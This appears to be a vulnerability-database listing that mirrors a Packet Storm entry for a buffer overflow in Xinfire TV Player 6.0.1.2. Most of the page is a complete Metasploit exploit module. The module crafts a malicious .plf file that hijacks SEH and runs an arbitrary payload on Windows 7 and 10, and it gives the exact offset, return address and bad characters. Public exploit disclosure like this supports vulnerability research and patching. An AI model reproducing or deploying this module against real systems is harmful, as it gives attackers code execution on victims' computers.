Lucene search
K

Xinfire TV Player 6.0.1.2 Buffer Overflow

🗓️ 20 Apr 2020 00:00:00Reported by metacomType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 138 Views

Xinfire TV Player 6.0.1.2 Buffer Overflow in Pro and Standard versions allows arbitrary code execution on Win7 and Win10

Code
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
class MetasploitModule < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Xinfire TV Player Buffer Overflow',  
'Description' => %q{  
This module exploits a buffer overflow in Xinfire TV Player Pro and Standard v6.0.1.2.When  
the application is used to import a specially crafted plf file, a buffer overflow occurs  
allowing arbitrary code execution.Tested successfully on Win7, Win10.This software is similar as   
Aviosoft Digital TV Player and BlazeVideo HDTV Player.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'metacom' # MSF Module and Vulnerability discovery   
],  
'References' =>  
[  
[ 'OSVDB', '' ],  
[ 'EDB', '' ],  
[ 'EDB', '' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 1384,  
'BadChars' => "\x00\x0a\x0d\x1a\x2f\x3a\x5c",  
'DisableNops' => true,  
},  
'Platform' => 'win',  
'Targets' =>  
[   
[ 'Windows Universal', { 'Ret' => 0x613018E9, 'Offset' => 608 } ], # p/p/r DTVDeviceManager.dll  
],  
'Privileged' => false,  
'DisclosureDate' => 'Apr 16 2020',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),  
])  
  
end  
  
def exploit  
  
buffer = rand_text(target['Offset']) #junk  
buffer << generate_seh_record(target.ret)  
buffer << payload.encoded #1384 bytes of space  
# more junk may be needed to trigger the exception  
  
file_create(buffer)  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation